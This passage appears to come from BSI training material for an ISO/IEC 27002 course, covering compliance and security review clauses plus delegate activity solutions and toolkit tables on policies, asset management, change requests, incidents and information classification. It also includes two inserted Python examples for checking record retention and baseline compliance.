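                   today=date(2017, 11, 1)):
    """Check every record against its retention rule and return the issues found:
    records kept past their permissible period, records on media the rule does not
    approve, records on media that is no longer supported (the obsolescence point
    in 18.1.3) and records whose storage location is unknown."""
    issues = []
    for r in records:
        rule = rules.get(r.record_type)
        if rule is None:
            issues.append(Issue(r.record_id, "no retention rule defined for record type"))
            continue
        expiry = r.created + timedelta(days=rule["days"])
        if today > expiry:
            issues.append(Issue(r.record_id, f"retention expired on {expiry.isoformat()}; dispose"))
        if r.medium not in rule["media"]:
            issues.append(Issue(r.record_id, f"medium '{r.medium}' not approved for {r.record_type}"))
        if r.medium not in supported_media:
            issues.append(Issue(r.record_id, f"medium '{r.medium}' no longer supported; migrate"))
        if not r.location:
            issues.append(Issue(r.record_id, "no storage location recorded in inventory"))
    return issues


def issues_for(record_id, issues):
    """Problems reported for one record, in the order they were found."""
    return [i.problem for i in issues if i.record_id == record_id]
```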
18.1.4 Privacy and protection of personally identifiable information
Privacy and protection of personally identifiable information should be ensured as required in relevant
legislation and regulation where applicable.
Organizations should develop policy to specifically detail how personal information should be
protected. The policy should be documented and communicated to all those under the control of the
organization to ensure that personal information of individuals is protected. The policy should be
developed taking into account the related legislation in place within the jurisdictions the organization
operates and should also take into account any related regulations and contractual requirements.
Once these requirements are understood, appropriate procedural and technical measures should be
implemented to ensure that the organization is able to comply with the documented policy. Where
necessary, and especially in large and/or complex organizations, specific responsibility should be given
to an individual (e.g. a data protection officer) for the protection of personal information. Such an
individual should be knowledgeable enough to provide advice to the organization related to suitable
levels of protection to put in place. The impacts on the organization related to non-compliance with
data protection related regulations can be significant including substantial fines and criminal
prosecutions.
18.1.5 Regulation of cryptographic controls
Cryptographic controls should be used in compliance with all relevant agreements, legislation and
regulations.
Where organizations use or intend to use cryptographic technology to provide confidentiality and
integrity protection, they should be aware of any limitations associated with its use as posed by local
legislation or through regulations or contractual requirements. A policy on the use of cryptographic
controls (see Clause 10) should be developed and implemented based in part on these limitations. In
particular, attention should be paid to any restrictions in place on the import and export of
cryptographic software and hardware into and out of the jurisdictions within which the organization
operates, as well as how the technology is used and what it is being used to protect. In some
jurisdictions, legislation provides for access by the authorities to material which is protected by
encryption, and so suitable processes should be implemented to ensure that these requirements can
be adhered to.
18.2 Information security reviews
Objective: To ensure that information security is implemented and operated in accordance with the
organizational policies and procedures.
18.2.1 Independent review of information security
The organization’s approach to managing information security and its implementation (i.e. control
objectives, controls, policies, processes and procedures for information security) should be reviewed
independently at planned intervals or when significant changes occur.
The organization’s management needs to ensure that it is in a position to determine if its approach to
managing information security is adequate and performing as expected. Consequently it is important
for reviews to be undertaken at regular intervals to test the approach. The reviews should be suitably
structured and should be conducted by someone independent of the area under review e.g. through
the use of an internal audit function, managers from other areas of the business or through the use
of third parties. Particular attention should be paid during the reviews to areas which are not meeting the
intention of a particular control, whether that intention is set by an International Standard such as ISO
27001 or by the organization’s own policies. Any non-conformance with requirements should be reported
to management, who should use the information to determine suitable courses of corrective action if
necessary and also to determine the need for continual improvement of the effectiveness of the
information security management system.
18.2.2 Compliance with security policies and standards
Managers should regularly review the compliance of information processing and procedures within
their area of responsibility with the appropriate security policies, standards and any other security
requirements.
Management at various levels throughout the organization should ensure that standards and policy
requirements are being met in their areas of responsibility and that processes and procedures are
being adhered to. Managers should determine how these measurements are to be made and what tools
are required to perform them. Within their areas of responsibility,
managers should also ensure where a non-conformance is discovered that root cause analysis is
undertaken to determine the underlying cause. Once the cause has been determined, suitable
corrective action should be implemented, with reviews of the action taken being conducted to
determine effectiveness. Records of the reviews of any corrective action undertaken should be kept
and periodically reported to management.
18.2.3 Technical compliance review
Information systems should be regularly reviewed for compliance with the organization’s information
security policies and standards.
As well as compliance with policies and standards (18.2.2), the organization should ensure that any
technical controls that have been deployed are also working effectively. Usually the most effective
way of doing this is through the use of automated tools, but manual processes can sometimes be
equally effective. The organization should determine and implement the appropriate review based on
the degree of assurance required by the organization that the controls are effective. To ensure that
operating platforms and applications do not present unnecessary risk to the organization, the use of
vulnerability scanning and penetration testing should be considered. Care should be taken when
undertaking such testing that the testing itself does not cause unnecessary risk to the environment
being tested, and so such testing should be change managed as appropriate and conducted in such a
way that disruption is kept to a minimum.
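The automated technical compliance review of 18.2.3, feeding the non-conformance records that 18.2.2 asks managers to keep, amounts to comparing observed system settings against a documented baseline. The Python below is an added example, not BSI's or any tool's code; the baseline rules, host names and observed values are constructed, and the rule set stands in for whatever the organization's own standards require.

```python
from dataclasses import dataclass

# Constructed baseline: (setting, comparison, required value). In practice these
# come from the organization's documented standards.
BASELINE = [
    ("password_min_length", ">=", 12),
    ("password_max_age_days", "<=", 90),
    ("ssh_root_login", "==", "no"),
    ("tls_versions", "subset_of", {"TLSv1.2", "TLSv1.3"}),
    ("days_since_last_patch", "<=", 30),
]

# Constructed observations, as an automated collector would report them per host.
OBSERVED = {
    "web-01": {"password_min_length": 14, "password_max_age_days": 60, "ssh_root_login": "no",
               "tls_versions": {"TLSv1.2", "TLSv1.3"}, "days_since_last_patch": 12},
    "db-01": {"password_min_length": 8, "password_max_age_days": 180, "ssh_root_login": "yes",
              "tls_versions": {"TLSv1.0", "TLSv1.2"}, "days_since_last_patch": 45},
    "legacy-01": {"password_min_length": 12},  # collector could not read the other settings
}


@dataclass(frozen=True)
class NonConformance:
    host: str
    setting: str
    observed: object   # None when the setting could not be observed
    required: str


def _conforms(op, observed, required):
    if op == ">=":
        return observed >= required
    if op == "<=":
        return observed <= required
    if op == "==":
        return observed == required
    if op == "subset_of":
        return set(observed) <= required
    raise ValueError(f"unknown comparison {op!r}")


def review(observed, baseline):
    """Return one non-conformance per host/setting that fails the baseline.
    A setting the collector could not observe is reported as well: missing
    evidence is itself a finding the reviewer must resolve."""
    findings = []
    for host, settings in sorted(observed.items()):
        for setting, op, required in baseline:
            if setting not in settings:
                findings.append(NonConformance(host, setting, None, f"{op} {required!r} (not observed)"))
            elif not _conforms(op, settings[setting], required):
                findings.append(NonConformance(host, setting, settings[setting], f"{op} {required!r}"))
    return findings


def summary(findings):
    """Non-conformance count per host, the figure a manager would report upward (18.2.2)."""
    counts = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts
```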
Activity 10: Pop quiz covering the whole two days
Purpose: Demonstrate understanding of terminology, clauses and controls from ISO/IEC 27002.
Duration: 30 minutes
Directions:
The class will be split into two groups. The tutor will read out a question to different members of
each group in turn. A point is scored for each correct answer and the score will be kept by the tutor
on the flipchart.
The learning objectives identified at the beginning of the course were:
Explain:
• The background and purpose of ISO/IEC 27002
• The scope and structure of ISO/IEC 27002
• The different best practice controls recommended by ISO/IEC 27002
• The benefits of implementing the controls from ISO/IEC 27002
• Evaluate how to use the controls in conjunction with an ISO/IEC 27001 based ISMS
• Demonstrate how to choose the appropriate controls relevant to you
• Demonstrate how to implement chosen controls from ISO/IEC 27002
Have your particular expectations/questions been answered?
References
This document contains typical activity solutions and additional information referred to
during the course.
Table of contents
Activity 1: Information security related terms and definitions ............................................. 2
Activity 2: Information security policy ............................................................................... 4
Activity 3: Organization of information security ................................................................. 8
Activity 4: Human resource security ................................................................................. 9
Activity 5: Asset management ....................................................................................... 10
Activity 6: Access control .............................................................................................. 12
Day one refresher quiz.................................................................................................. 13
Activity 7: Change management .................................................................................... 15
Activity 8: Supplier relationships .................................................................................... 18
Activity 9: Incident management ................................................................................... 19
Activity 10: Pop quiz ..................................................................................................... 20
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
1 of 22
Activity 1: Information security related terms and definitions
Term – Definition
Policy – A course or principle of action adopted or proposed by an organization
Process – An action or set of related actions that turn an input into an output
Procedure – A set of steps which describe how to undertake a process
Control – A measure introduced to modify the value of a risk by changing the impact or likelihood of its occurrence
Asset – Something of value
Access control – A way of limiting access to information and systems to only those individuals who are authorised to have access
Asset value – The value of an asset to an organization measured in business terms based on the impact on the organization if the asset were to be compromised
Authentication – The process of a user verifying that they are who they claim to be, usually through the use of a combination of username and password
Confidentiality – The state of keeping or being kept secret or private
Integrity – The state of information being up to date, accurate and complete
Availability – The property of information that relates to whether authorised users can gain access to information and associated assets when required
Threat – The potential cause of an unwanted incident that may result in harm to a system or organization
Vulnerability – A weakness in an asset or group of assets that can be exploited by one or more threats
Likelihood – The aspect of a threat that looks at circumstances which affect the chance of it materializing
Risk – The potential that a given threat will exploit a vulnerability of an asset and cause an impact to the organization
Authorization – The process of providing permission for a user to be granted access to information or information system resources
British Standards Institution – The UK National Standards body
Detective Control – A control which informs that a threat has exploited a vulnerability
Deterrent Control – A control which announces the consequences of not complying with policy or committing unauthorized actions (e.g. disciplinary policy)
Encryption – The translation of data into a secret code
Asymmetric key cryptography – An encryption technique where the keys used to encrypt and decrypt are different
Symmetric key cryptography – An encryption technique where the keys used to encrypt and decrypt are the same
Impact – The result of a threat exploiting a vulnerability in an asset
Incident – A single or series of unwanted events that have had or have a significant probability of having an impact on an asset
Information security – The protection of the confidentiality, integrity and availability of information
Information Security Management System (ISMS) – The overall framework used to manage information security across an organization
Internet – A global system of interconnected computer networks
Malicious code – The term used to describe any code in any part of a software system or script that is intended to cause undesired effects
Non-repudiation – The assurance that a person cannot deny having completed a specific action
Physical control – A control which prevents threats to an asset through physical means (e.g. locks on doors)
Preventive controls – A control which is used to prevent unauthorized actions
Privacy – The property of an item which defines whether or not an unauthorised individual can see it (often used interchangeably with confidentiality)
Recovery control – A control which returns a system or information to a previous state
Risk assessment – The process of assessing whether a risk exists or not, including the evaluation of the size of the risk
Activity 2: Information security policy
SAMPLE INFORMATION SECURITY POLICY
1. Purpose
To define the policy requirements for information security within ABC Organization Ltd
2. Scope
Information takes many forms. The scope of this Information Security Policy includes, but is
not limited to:
• All information processed by ABC Organization Ltd in pursuit of its operational activities,
  regardless of whether it is processed electronically or in paper form, including but not limited to:
    • External customer products, materials, information and reports
    • Operational documents, plans, and minutes
    • Financial and compliance records
    • Employee records
• All information processing facilities used in support of ABC Organization Ltd’s operational
  activities to store, process and transmit information
• All external organizations that provide services to ABC Organization Ltd in respect of
  information processing facilities.
3. Definitions
Information security protects the following three attributes of ABC Organization Ltd’s
information:
• Confidentiality – Property that information is not made available or disclosed to
  unauthorized individuals, entities, or processes
• Integrity – Property of protecting the accuracy and completeness of assets
• Availability – Property of being accessible and usable upon demand by an
  authorized entity.
Other definitions applicable to this policy:
Employees – ABC Organization Ltd’s staff (permanent and temporary).
Information asset – Any information and information processing assets of value to ABC
Organization Ltd.
Information owner – An individual accountable for the information asset.
Information processing facilities – Any information processing system, service or
infrastructure, or the physical locations housing them.
Subject: Activity 2 - Information Security Policy
Author:
Document Type: Policy
Page: 4 of 4
Authorized by:
Effective Date:
Version 1.0
Next Review:
4. Risks
Lack of information security can lead to incidents such as breach of confidentiality, the
corruption or unavailability of information which could affect ABC Organization Ltd’s (and its
customers’) financial results, compliance with regulations and legislation, reputation, and
ability to trade.
Without defined and measurable objectives, it is not possible to determine whether ABC
Organization Ltd’s information security activities are effective and efficient.
5. Objectives
The objective of this Information Security Policy is to enable ABC Organization Ltd to
effectively manage its information security threats in order to support its business strategy
and maintain its legal, regulatory, internal and contractual compliance obligations.
ABC Organization Ltd’s security controls cover all threats, whether external or internal,
deliberate or accidental.
Compliance with this Information Security Policy is necessary to ensure business continuity,
and minimize business damage by preventing the occurrence, and minimising the impact, of
information security incidents.
In support of this Information Security Policy, the Board of ABC Organization Ltd accepts its
role in being fully accountable for information security and is committed to:
• Managing and reducing risk in an informed manner
• Minimizing impact on the organization when information security incidents occur
• Ensuring that the organization has identified the legal requirements and that they are complied
  with
6. Responsibilities
ABC Organization Ltd’s Executive shall be accountable for ensuring that appropriate security
and compliance controls are identified, implemented and maintained by information owners.
They shall be supported in this task by the Information Security Forum (ISF).
The role and responsibility for managing information security at an operational level shall be
performed by the information security Manager. The information security Manager has direct
responsibility to the ISF for maintaining this Information Security Policy, and providing advice
and guidance on its implementation.
Information owners within ABC Organization Ltd shall be responsible for the identification,
implementation and maintenance of controls that are commensurate with the value of the
information assets they own and the risks to which they are exposed.
It is the responsibility of all employees to adhere to this Information Security Policy.
Non-compliance with the Information Security Policy by any employee shall result in
disciplinary action.
7. Policy
7.1 Information Security
This Information Security Policy provides that ABC Organization Ltd shall ensure that:
• Information assets and information processing facilities shall be protected against
  unauthorized access
• Information shall be protected from unauthorised disclosure
• Confidentiality of information assets shall be a high priority
• Integrity of information shall be maintained
• ABC Organization Ltd requirements, as identified by information owners, for the
  availability of information assets and information processing facilities required for
  operational activities shall be met
• Statutory, and expressed and implied legal obligations shall be met
• Regulatory, contractual and internal compliance obligations shall be met
• Requirements for the continuity of information security shall be determined and
  maintained within ABC Organization Ltd’s business continuity arrangements
• Unauthorized use of information assets and information processing facilities shall be
  prohibited; the use of obscene, racist or otherwise offensive statements shall be dealt
  with in accordance with other policies published by ABC Organization Ltd
• This Information Security Policy shall be communicated to all employees, for whom
  information security training shall be given
• A systematic approach to information security risk management shall be followed and
  shall be a dynamic and continual process
• Information security shall be managed through a formal Information Security
  Management System (ISMS) that shall be defined within a documented framework
• All breaches of information security, actual or suspected, shall be reported and
  investigated in line with [Organization]’s published policies
• Controls shall be commensurate with the risks faced by ABC Organization Ltd.
In support of this Information Security Policy, more detailed operational security policies and
processes shall be developed for employees, information assets and information processing
facilities. These policies shall be reviewed at planned intervals or if significant changes occur
to ensure their continuing suitability, adequacy and effectiveness.
7.2 Deviations and exceptions
Any deviations from this policy must be authorised by ABC Organization Ltd’s ISF.
Exceptions and deviations shall be managed through ABC Organization Ltd’s incident
management or change management processes.
8. Key performance measures
Information security objectives shall be agreed on an annual basis, supported by a set of key
performance indicators (KPIs), with milestones and targets. These measures shall be
reported to the ISF for review.
9. Review and maintenance
This Information Security Policy shall be reviewed annually by the policy owner to ensure it
remains fit for purpose.
10. References
• ISO/IEC 27000:2013 Information technology – Security techniques – Information
  security management systems – Overview and vocabulary (ISO 27000)
• BS ISO/IEC 27001:2013 Information technology – Security techniques – Information
  security management systems – Requirements (ISO 27001)
• BS ISO/IEC 27002:2013 Information technology – Security techniques – Code of
  practice for information security controls (ISO 27002)
11. Change History
Issue 1 – 27 August 2017 – First published
Activity 3: Organization of information security
Part 1
Responsibilities 1 - EXECUTIVE
• Provide visible top commitment for security
• Accountable for organization wide information security management system
• Approve corporate information security policy
• Approve organization risk appetite
• Determine strategic security planning
Responsibilities 2 – INFORMATION SECURITY FORUM (CONSISTS OF DIRECTORS)
• Initiate development of security policies
• Review effectiveness of information security
• Approve resources
• Responsible to senior managers for day-to-day security
Responsibilities 3 – MANAGERS
• Implement security consistent with business requirements
• Ensure staff availability for security education and training
• Support incident investigations
• Adhere to security policies
Responsibilities 4 - EVERYONE
• Keep organization’s information confidential
• Be aware of security implications of their actions
• Report suspicious behaviour and security incidents
Part 2
The directors should be members of the forum as they are budget holders and decision
makers within the organization and are in a position to be able to get things done.
Part 3
The Information Security Manager could report to any non-functional part of the
organization. In the example organization chart used here, the best place is to the Director
of Compliance. A second option would be directly to the CEO or Executive Board.
Activity 4: Human resource security
For all three roles (and any others in the organization), there are a number of checks that
should be performed, as a matter of course, to ensure that suitable people are being
recruited by the organization in general. Some of these checks are also likely to be required
by various pieces of legislation associated with company law. These are likely to include:
• Identification checks
• Residency checks
• Eligibility to work in the UK checks
• Previous work history (references?)
• Review and verification of CV
• Interview
In addition to the general checks, there may also be some role-specific checks that are
carried out:
• Internal auditor
    • Education, e.g. school/university
    • Professional qualifications, e.g. CISA
    • Testing, in line with the requirements of the role of auditor
    • Security clearance may be required depending upon the areas that are to be
      audited
• Payroll officer
    • Education, e.g. school/university
    • Professional qualifications, e.g. accountancy related or similar
    • Testing, in line with the requirements of the role of payroll officer
    • Financial records checks, e.g. it may be unwise to appoint someone into a role
      that handles money if they are heavily in debt
    • Criminal records check, e.g. it may be unwise to appoint someone into a role
      that handles money if they have previous convictions for theft or fraud
• Firewall administrator
    • Education, e.g. school/university
    • Professional qualifications, e.g. technical qualifications related to the use and
      configuration of firewalls
    • Testing, in line with the requirements of the role of firewall administrator
    • Criminal records checks, e.g. it may be unwise to appoint someone into a role
      administering the organization’s firewalls if they have previous convictions for
      computer related crime
ISM02101ENGX v2.0 Nov 2017
©The British Standards Institution 2017
9 of 22
References
Activity 5: Asset management
Asset | Category | Value | Owner
Laptops | Technology | C, I | IT Director
Technology staff | People | C, I, A | IT Director
Communications room | Physical | C, A | Facilities Director or similar
Electrical supply | Services and systems | A | Facilities Director or similar
Mobile phones | Technology | C, A | IT Director
Website source code | Information | C, I | IT Director
Head office building | Physical | C, I, A | Facilities Director or similar
Payroll information | Information | C, I | HR Director
Distribution centres | Physical | I, A | Facilities Director or similar
Customer feedback | Information | C | Operations Director or similar
Reputation | Intangible | I | Executive
Change management process | Intangible/information (if documented) | I, A | IT Director
Car parking | Physical or not relevant | X or A | Facilities Director or similar
Vending machine | Physical or not relevant | X or A | Facilities Director or similar
Security guards | People | C, I, A | Facilities Director or similar
Staff screening records | Information | C, I | HR Director
Brand | Intangible | I | Executive
HR staff | People | C, I, A | HR Director
Web servers | Technology | I, A | IT Director
Desktop PCs | Technology | C, I | IT Director
Internal audit reports | Information | C, I | Compliance Director
Training material | Information | I | HR Director
Activity 6: Access control
Note: The answers below are only examples. It is likely that you have found other valid
controls.

Asset: Laptops
• A.11.2.6 – Laptops are invariably removed from site and so knowing how to protect them
  away from the office is important.
• A.11.2.8 – Users should be advised on the policy related to unattended equipment.

Asset: Technology staff
• A.9.3.1 – It is important that users follow best practice for protecting information they
  have access to through the use of suitable passwords.
• A.9.4.1 – Users should be restricted to only having access to the information they need
  for their role.

Asset: Communication room
• A.11.1.2 – Suitable entry controls need to be provided to prevent unauthorized access
  into secure areas such as communications rooms.
• A.11.2.1 – Equipment should be sited in such a way as to prevent unauthorized access.
  In the communications room this will include such things as using lockable cabinets etc.

Asset: Website source code
• A.9.1.1 – Access to source code should only be available to specific roles in the
  organization, such as the website developer.
• A.9.4.1 – Further restrictions can be placed on access to source code, such as only
  providing read access for those who have a responsibility to review code but shouldn’t
  have sufficient access to change it.

Asset: Payroll information
• A.9.4.1 – Restrictions should be placed on access to sensitive information based on a
  need-to-know principle.
• A.10.1.1 – Sensitive information could be encrypted in storage and during communication
  to prevent unauthorized access.
Day one refresher quiz
# | Question | Answer
1 | How many clauses are there in ISO 27002? |
2 | How many different controls are there in ISO 27002? |
3 | Who should determine the content of the Information Security Policy? |
4 | What is teleworking? |
5 | Performing ID and residence checks and following up on references is known as what? |
6 | One of the biggest causes of security incidents is user error. What is one of the best controls to combat user error? |
7 | Clauses in employment contracts that prevent an employee from using company information after their employment has ended are known as what? |
8 | The standard suggests that organizations should draw up and maintain an inventory of assets. What should be communicated to users to ensure that these assets are not misused? |
9 | When disposing of electronic media, the organization must do so in line with the requirements of what other control recommended by the standard? |
10 | As well as access to information and information systems, what other aspect of the computing environment needs to be considered for inclusion within the access control policy? |
11 | In order to ensure that the users’ access rights to different information systems and assets remain appropriate, what should the organization do? |
12 | What is an asset? |
13 | What is CIA in terms of information security? |
14 | Cryptographic techniques can be used to protect the confidentiality of information when it is stored and communicated. What other aspect of information security can cryptographic techniques be used to protect? |
15 | What is a control? |
16 | What is authentication? |
17 | What is the difference between a policy and a process? |
18 | What is confidentiality? |
19 | What is integrity? |
20 | What is availability? |
Activity 7: Change management
There is not necessarily a right or wrong answer to this activity. The discussion following
completion of the activity is likely to focus on the following topics:
• Impact of change
• Priority of change
• Backout plans
• Approval (i.e. who was chosen as the approver and why)

Sample form:
ABC Organization Ltd Change Request Form

General information
Change request number: 00001
Requestor name: John Doe – IT Operations Manager
Date: 26 October 20xx
Office: Birmingham
Contact: Desk phone 0121 012 3456; Mobile number 07123 456 789; Email address j.doe@abcorg.co.uk

Change request definition
Description – Describe the proposed change
Upgrade all Windows database servers to Windows 20xx.
Justification – Justify why the proposed changes should be implemented
As part of our support contract, we are required to ensure that all our servers are installed with the
latest release of any software. The upgrade also ensures that ABC Organization has a fully patched
Windows environment to guard against increasingly sophisticated cyber attacks.
Impact of not implementing – Explain the impact if the proposed change is not implemented
If the servers are not upgraded, then there is a greater risk of being the victim of cyber attack. Also, in
the near future, our existing version of Windows 20yy will no longer be supported as part of our
maintenance contract, leading to an increased technical vulnerability over time.

Change request impact evaluation (check one): High / Medium / Low
Impact description – Describe the impact and justify your choice above
The database servers will be offline while the upgrade takes place and so no database transactions will
be able to take place.
Change request priority (check one): 1 / 2 / 3 / Emergency
Priority justification (describe why you have chosen the priority indicated above)
This change does not need to be done urgently but needs to take place within the next 30 days due to
the terms of our support contract.
Change rollback plan – Describe the rollback process in case of change failure
All servers will be backed up before being upgraded. If the upgrade fails then the servers will be rolled
back to a previous known working configuration and the backups will be restored.
Change test plan – Describe the testing process
When the upgrade is complete a number of test transactions will take place and the database manager
will confirm that all tables and data are intact and accessible by the business.

Change request approval
Name (identify change request approvers) | Recommendation
IT Director | Approve / Reject
Operations Director | Approve / Reject
(unnamed) | Approve / Reject
(unnamed) | Approve / Reject

Key:
Impact levels
High – Any change that has a high degree of probability of affecting a significant number of
users or which means that the availability of a key system is affected for a significant period of
time.
Medium – Any change that has the probability of affecting several users or which means that
the availability of a system is affected for a long period of time.
Low – Any change that will only affect a single user or a small number of users or which
means that the availability of a system is affected for a short period of time.
Priority levels
1 – The change is required to take place within 7 days
2 – The change is required to take place within 14 days
3 – The change is required to take place within 30 days
Emergency – The change has already been completed to resolve a security incident or
severe business issue and this form is being completed retrospectively.
Activity 8: Supplier relationships
Supplier relationships
Please note that the questions below are simply suggestions and there may well be other
questions that you think are more relevant.
1 – What ABC Organization Ltd information or information systems does your organization
have access to?
2 – Do you store ABC Organization Ltd information within your own systems and/or
environment?
3 – Is your organization ISO 27001 certified? If yes, what is the scope of your certification?
4 – Does your organization have an Information Security Policy which is available to all staff
and contractors?
5 – What background screening is conducted for staff and contractors?
6 – What information security awareness, education and training does your organization
conduct with staff and contractors?
7 – Does a failure to comply with company policy lead to disciplinary action?
8 – What access control methods does your organization deploy to prevent unauthorized
access to information?
9 – Are all users allocated a unique username and are they required to choose a complex
password of minimum length that is only known to them?
10 – Under what circumstances will information security events and/or incidents be reported
to ABC Organization Ltd?
Activity 9: Incident management
Suggested steps that need to be taken:
• Arrange to meet the caller to retrieve the laptop
• Collect the laptop and ask the caller if any information from the laptop has been
  accessed or shared with anyone
• Determine who the laptop was last allocated to through the use of the asset tag
• Speak to the person who the laptop was last allocated to in order to determine what
  information was held on the laptop
• Determine the possible impact of unauthorized access to information on the laptop
• Contact the disposal company to find out why the laptop ended up on an auction site
  with data on the hard drive still intact
• Take steps to ensure that processes are updated so that the problem cannot recur
• Determine if the disposal company is in breach of contract
• Escalate the incident to outside authorities if necessary (e.g. the ICO)
• Seek necessary compensation if appropriate
Activity 10: Pop quiz
# | Question | Answer
1 | ISO 27002 provides best practice recommendations for protecting information. What is the name of the related standard against which organizations can seek certification? | ISO 27001
2 | How many mandatory controls exist in ISO 27002? | None
3 | How many main security categories are there in ISO 27002? | 35
4 | What type of document should be used to describe the rules related to how an organization manages its information security? | Policy
5 | What is the control called that enables organizations to reduce the possibility of fraud occurring by making different people responsible for different parts of a process? | Segregation of duties (control 6.1.2 in the standard)
6 | When is the best time to introduce information security considerations within the project management lifecycle? | As soon as possible (i.e. right at the beginning, such as at the requirements gathering phase)
7 | The use of DVDs, laptops, USB drives and mobile phones should be governed by the rules published in which document according to control 6.2.1? | Mobile device policy
8 | Terms and conditions of employment is a highly specific document which describes the duties of an individual within an organization – True or false? | False. Terms and conditions of employment are issued to all employees and will be identical for all and so describe the duties and responsibilities that apply to all roles. The specific document would be a job description.
9 | Suggest a control from the standard which should be used within HR security prior to employment. | Either 7.1.1 Screening or 7.1.2 Terms and conditions of employment
10 | Best practice suggests that information security awareness, education and training should be conducted when? | During induction, when they first start working for the organization, and then periodically throughout their employment.
11 | In order for policy documents to be effective they should be linked to what HR related process in case of non-compliance? | Disciplinary process
12 | Individuals within organizations should be allocated the responsibility to provide day-to-day protection for important information assets and are authorized by the business to make risk based decisions about the protection provided. These individuals are known as what? | Asset owners
13 | Why is it useful for an organization to have an up to date asset inventory? | So that the organization knows what assets it has
14 | Why is an information classification scheme a good idea? | It allows information assets to receive appropriate levels of protection based on their sensitivity.
15 | When should labelling of assets with their classification be considered? | When they are in tangible form, i.e. on paper etc.
16 | For controls 8.3.2 and 8.3.3 (disposal of media and physical media transfer) what else also needs to be considered as media? | Paper
17 | The organization should determine who is allowed access to what information assets and for what reason. What document would include this information? | Access control policy
18 | What two pieces of information associated with a user’s login credentials should be unique? | Username and password (or other authentication credential such as a token or biometric (e.g. fingerprint))
19 | The organization should ensure that the user access management process includes information about what levels of access are required within different systems for different types of user. What is this known as according to control 9.2.3 in the standard? | Management of privileged access rights (a point is awarded if the word privileged or privileges etc. is mentioned).
20 | Why is it a good idea for a password to be of a minimum length, i.e. eight characters? | It increases the number of possible combinations of characters within the password, which makes the task of cracking it more difficult for an attacker.
21 | What control goes hand in hand with 10.1.1 Policy on the use of cryptographic controls? | Key management (10.1.2)
22 | Control 11.1.4 Protecting against external and environmental threats includes consideration of what type of threat which is impossible to prevent? | Natural disasters
23 | Why is it best practice to not route electricity cables and data cables close together? | Because the electromagnetic interference from electricity cables could cause an impact on the data travelling within the data cable
24 | What is a clear desk policy designed to do? | Ensure that confidential information is not left on desks when unattended
25 | How many operating procedures must be documented? | As many as the organization requires
26 | Communication with the rest of the business before an upgrade to the system takes place in order to ensure that impact is kept to a minimum is known as what? | Change management
27 | What is the main thing that needs to be understood before appropriate controls can be determined and implemented when dealing with third parties? | The risk associated with working with the third party
28 | What aspect of incident management is the responsibility of everyone? | Reporting incidents, events, weaknesses etc.
29 | Once business continuity plans have been developed what needs to take place on a regular basis to determine whether or not they are likely to work when needed? | Testing
30 | Organizations should ensure that they identify all applicable legislation, contractual requirements and what else? | Regulations
Toolkit
Please note: BSI provides all the management system content below on an “AS IS”
basis (relevant to this toolkit).
The content is compiled from materials created by BSI and should be used as a
reference source only.
BSI does not warrant the fitness for purpose, completeness or accuracy of the
provided examples below.
Table of contents:
Information classification – Example handling table ...........................................................2
Example access control matrix .........................................................................................5
Access control policy .......................................................................................................7
Clear desk and clear screen policy .................................................................................. 10
Information security incident reporting and management policy ....................................... 12
Information transfer policy ............................................................................................ 17
Physical and environmental security policy ...................................................................... 19
Information security internal audit schedule .................................................................... 29
All items will be available on a memory card to be provided to all delegates.
Information classification – Example handling table

DEFINITION
[Secret] – Information that is available to named staff or partners, customers, suppliers or other third parties that are subject to either a confidentiality agreement or where non-disclosure forms part of a legally binding agreement
[Client confidential] – Information that is available only to a specific individual or group of individuals who are staff, partners, customers, suppliers or other third parties who are required to access client based information as part of their role
[Internal use only] – Information that is available to all staff and which may also be shared with partners, customers, suppliers or other third parties on an as needed basis and where a confidentiality agreement has been signed or where non-disclosure is part of a legally binding agreement
[Public] – Information that is available in the public domain or that represents no impact on the business if it were to be made public

ACCESS RESTRICTION
[Secret] – Named individuals only on a need to know basis. Cannot be revealed to other parties without the prior agreement of the senior management team
[Client confidential] – Restricted to named individuals or distribution lists on a need to know basis. Cannot be revealed to other parties without the prior agreement of the information asset owner
[Internal use only] – All staff and authorised parties. No access control requirements for staff. Controlled access for trusted third parties
[Public] – General public. No access controls

DISCLOSURE APPROVAL
[Secret] – Disclosure is approved by a member of the senior management team and the information owner
[Client confidential] – Disclosure is approved by the information owner
[Internal use only] – Disclosure to staff, approval not required. Disclosure to third parties is approved by the information owner
[Public] – Disclosure approval not required

EXAMPLES
[Secret] – Merger and acquisition information, incident reports and controlled evidence
[Client confidential] – Tenders, quotes, contracts, financial records
[Internal use only] – Policies, processes, procedures
[Public] – Marketing material

LABELLING
[Secret] – Information, media, containers and outputs to be labelled as “SECRET”
[Client confidential] – Information, media, containers and outputs to be labelled as “CLIENT CONFIDENTIAL”
[Internal use only] – Information, media, containers and outputs labelled as “INTERNAL USE ONLY”
[Public] – No label required

INTERNAL MAILING
[Secret] – Internal unmarked sealed envelope delivered by hand
[Client confidential] – Sealed envelope delivered by hand or by internal courier
[Internal use only] – Unsealed envelope
[Public] – No envelope

EXTERNAL MAILING
[Secret] – Tamper evident envelope delivered by hand (e.g. courier) or registered mail
[Client confidential] – Tamper evident envelope
[Internal use only] – Unsealed envelope delivered by courier or standard mail
[Public] – No restrictions

TRANSFER – Email (internal)
[Secret] – Email not allowed
[Client confidential] – Email allowed provided encrypted before sending
[Internal use only] – Email allowed
[Public] – No restrictions

TRANSFER – Email (external)
[Secret] – Email not allowed
[Client confidential] – Email allowed provided encrypted before sending
[Internal use only] – Email allowed but only to approved recipients
[Public] – No restrictions

DISPOSAL – Paper
[Secret] – Cross cut shred. Destruction of all information to be logged
[Client confidential] – Cross cut shred. Destruction of information to be logged if carried out by third party
[Internal use only] – Cross cut shred
[Public] – No restrictions

DISPOSAL – Hard drives
[Secret] – High intensity format followed by physical destruction
[Client confidential] – Format and destroy
[Internal use only] – Format
[Public] – No restrictions

STORAGE – Hardcopy
[Secret] – Kept in a fire proof safe or controlled area protected by PIN, combination lock or controlled key
[Client confidential] – Kept in fire safe or locked storage
[Internal use only] – Kept in cupboards or on available shelving
[Public] – No restrictions

STORAGE – Electronic
[Secret] – Kept in access controlled folders on a secure server which is appropriately backed up and encrypted
[Client confidential] – Kept in access controlled folders on corporate or local server that is appropriately backed up and encrypted
[Internal use only] – Kept in public folders on corporate or local server that is appropriately backed up
[Public] – Kept in public folders on a server that is appropriately backed up

Note: the above table is only a small example and in reality many more assets and scenarios are likely to need to be
included in column one, for which rules should be defined for each of the classification levels defined.
Example access control matrix
The example below is based upon the information supplied within activities 3 and 5 of the course. This matrix, when fully completed for an
